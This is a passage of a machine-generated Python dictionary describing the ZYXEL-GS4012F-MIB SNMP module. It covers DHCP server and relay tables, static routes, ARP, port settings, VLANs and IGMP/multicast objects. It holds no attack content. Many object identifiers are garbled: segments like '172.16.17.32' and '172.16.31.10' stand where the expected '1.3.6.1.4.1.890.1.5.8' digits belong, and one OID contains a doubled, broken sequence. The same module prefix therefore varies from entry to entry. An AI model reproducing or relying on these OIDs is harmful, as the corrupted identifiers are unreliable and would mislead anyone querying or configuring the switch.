"oid" : "172.16.17.32.4.1.890.1.5.8.20.20.1.6.1",
"create" : "true",
"status" : "current",
"linkage" : [
"globalDhcpRelayRemoteServerIp",
],
"description" :
"""An entry in globalDhcpRelayRemoteServerTable.""",
}, # row
"globalDhcpRelayRemoteServerIp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.20.1.6.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"globalDhcpRelayRemoteServerRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.20.1.6.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpServer" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.20.2",
}, # node
"maxNumberOfDhcpServers" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.20.2.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The maximum number of DHCP server entries that can be created.
A value of 0 for this object implies that there exists settings for
global DHCP relay.""",
}, # scalar
"dhcpServerTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.20.2.2",
"status" : "current",
"description" :
"""""",
}, # table
"dhcpServerEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.20.2.2.1",
"create" : "true",
"status" : "current",
"linkage" : [
"dhcpServerVid",
],
"description" :
"""An entry in dhcpServerTable.""",
}, # row
"dhcpServerVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.2.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"dhcpServerStartAddr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.20.2.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpServerPoolSize" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.2.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpServerMask" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.2.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpServerGateway" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.20.2.2.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpServerPrimaryDNS" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.20.2.2.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpServerSecondaryDNS" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.20.2.2.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpServerRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.2.2.1.8",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpRelay" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.3",
}, # node
"dhcpRelayInfoData" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.3.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"maxNumberOfDhcpRelay" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.3.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The maximum number of DHCP relay entries that can be created.
A value of 0 for this object implies that there exists settings for
global DHCP relay.""",
}, # scalar
"maxNumberOfDhcpRelayRemoteServer" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.20.3.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpRelayRemoteServerTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.20.3.4",
"status" : "current",
"description" :
"""""",
}, # table
"dhcpRelayRemoteServerEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.20.3.4.1",
"create" : "true",
"status" : "current",
"linkage" : [
"dhcpRelayVid",
"dhcpRelayRemoteServerIp",
],
"description" :
"""An entry in dhcpRelayRemoteServerTable.""",
}, # row
"dhcpRelayVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.3.4.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"dhcpRelayRemoteServerIp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.3.4.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"dhcpRelayRemoteServerRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.3.4.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpRelayTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.3.5",
"status" : "current",
"description" :
"""""",
}, # table
"dhcpRelayEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.3.5.1",
"status" : "current",
"linkage" : [
"dhcpRelayVid",
],
"description" :
"""An entry in dhcpRelayTable.""",
}, # row
"dhcpRelayOption82Enable" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.3.5.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpRelayInfoEnable" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.3.5.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"staticRouteSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.21",
}, # node
"maxNumberOfStaticRoutes" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.21.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"staticRouteTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.21.2",
"status" : "current",
"description" :
"""""",
}, # table
"staticRouteEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.21.2.1",
"create" : "true",
"status" : "current",
"linkage" : [
"staticRouteIp",
"staticRouteMask",
],
"description" :
"""An entry in staticRouteTable.""",
}, # row
"staticRouteName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.21.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"staticRouteIp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.21.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"staticRouteMask" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.21.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"staticRouteGateway" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.21.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"staticRouteMetric" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.21.2.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"staticRouteRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.21.2.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInfo" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.22",
}, # node
"arpTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.22.1",
"status" : "current",
"description" :
"""""",
}, # table
"arpEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.22.1.1",
"status" : "current",
"linkage" : [
"arpIpAddr",
"arpMacVid",
],
"description" :
"""An entry in arpTable.""",
}, # row
"arpIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.22.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpIpAddr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.22.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpMacAddr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.22.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpMacVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.22.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpType" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.22.1.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"static" : {
"nodetype" : "namednumber",
"number" : "1"
},
"dynamic" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readonly",
"description" :
"""1-static, 2-dynamic""",
}, # column
"portOpModeSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.23",
}, # node
"portOpModePortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.23.1",
"status" : "current",
"description" :
"""""",
}, # table
"portOpModePortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.23.1.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in portOpModePortTable.""",
}, # row
"portOpModePortFlowCntl" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.23.1.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"off" : {
"nodetype" : "namednumber",
"number" : "0"
},
"on" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"portOpModePortName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.23.1.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"ranges" : [
{
"min" : "0",
"max" : "32"
},
],
"range" : {
"min" : "0",
"max" : "32"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"portOpModePortLinkUpType" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.23.1.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"down" : {
"nodetype" : "namednumber",
"number" : "0"
},
"copper" : {
"nodetype" : "namednumber",
"number" : "1"
},
"fiber" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"portOpModePortIntrusionLock" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.23.1.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"portOpModePortLBTestStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.23.1.1.7",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"none" : {
"nodetype" : "namednumber",
"number" : "0"
},
"underTesting" : {
"nodetype" : "namednumber",
"number" : "1"
},
"success" : {
"nodetype" : "namednumber",
"number" : "2"
},
"fail" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readonly",
"description" :
"""This entry display latest loopback test status of port while performing loopback test.""",
}, # column
"portOpModePortCounterReset" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.23.1.1.8",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"enable" : {
"nodetype" : "namednumber",
"number" : "1"
},
"disable" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""This entry resets port counter.""",
}, # column
"portBasedVlanSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.24",
}, # node
"portBasedVlanPortListTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.24.1",
"status" : "current",
"description" :
"""""",
}, # table
"portBasedVlanPortListEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.24.1.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in portBasedVlanPortListTable.""",
}, # row
"portBasedVlanPortListMembers" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.24.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"Q-BRIDGE-MIB", "name" : "PortList"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"multicastPortSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.25",
}, # node
"multicastPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.25.1",
"status" : "current",
"description" :
"""""",
}, # table
"multicastPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.25.1.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in multicastPortTable.""",
}, # row
"multicastPortImmediateLeave" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.25.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"multicastPortMaxGroupLimited" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.25.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"multicastPortMaxOfGroup" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.25.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""0..255""",
}, # column
"multicastPortIgmpFilteringProfile" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.25.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"multicastPortQuerierMode" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.25.1.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"auto" : {
"nodetype" : "namednumber",
"number" : "1"
},
"fixed" : {
"nodetype" : "namednumber",
"number" : "2"
},
"edge" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readwrite",
"description" :
"""Specify query mode for each port""",
}, # column
"multicastStatus" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26",
}, # node
"multicastStatusTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.1",
"status" : "current",
"description" :
"""""",
}, # table
"multicastStatusEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.1.1",
"status" : "current",
"linkage" : [
"multicastStatusVlanID",
"multicastStatusPort",
"multicastStatusGroup",
],
"description" :
"""An entry in multicastStatusTable.""",
}, # row
"multicastStatusIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"multicastStatusVlanID" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.26.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"multicastStatusPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"multicastStatusGroup" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpCountTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.2",
"status" : "current",
"description" :
"""A count table of igmp query/report/leave message.""",
}, # table
"igmpCountEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.2.1",
"status" : "current",
"linkage" : [
"igmpCountIndex",
],
"description" :
"""An entry in igmpCountTable.""",
}, # row
"igmpCountIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Index of IgmpCountEntry. 0 means total count in whole system""",
}, # column
"igmpCountInQuery" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpCountInReport" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpCountInLeave" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpCountInQueryDrop" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.2.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpCountInReportDrop" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.2.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpCountInLeaveDrop" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.2.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpCountOutQuery" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.2.1.8",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpCountOutReport" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.26.2.1.9",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpCountOutLeave" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.2.1.10",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"multicastVlanStatusTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.3",
"status" : "current",
"description" :
"""""",
}, # table
"multicastVlanStatusEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.3.1",
"status" : "current",
"linkage" : [
"multicastVlanStatusVlanID",
],
"description" :
"""An entry in multicastVlanStatusTable.""",
}, # row
"multicastVlanStatusVlanID" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.2172.16.31.10",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"multicastVlanStatusType" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.3.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"dynamic" : {
"nodetype" : "namednumber",
"number" : "1"
},
"mvr" : {
"nodetype" : "namednumber",
"number" : "2"
},
"static" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"multicastVlanQueryPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.3.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"Q-BRIDGE-MIB", "name" : "PortList"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpFilteringProfileSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.27",
}, # node
"igmpFilteringMaxNumberOfProfile" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.27.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"igmpFilteringProfileTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.27.2",
"status" : "current",
"description" :
"""""",
}, # table
"igmpFilteringProfileEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.27.2.1",
"create" : "true",
"status" : "current",
"linkage" : [
"igmpFilteringProfileName",
"igmpFilteringProfileStartAddress",
"igmpFilteringProfileEndAddress",
],
"description" :
"""An entry in igmpFilteringProfileTable.""",
}, # row
"igmpFilteringProfileName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.27.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpFilteringProfileStartAddress" : {
"nodetype" : "column",
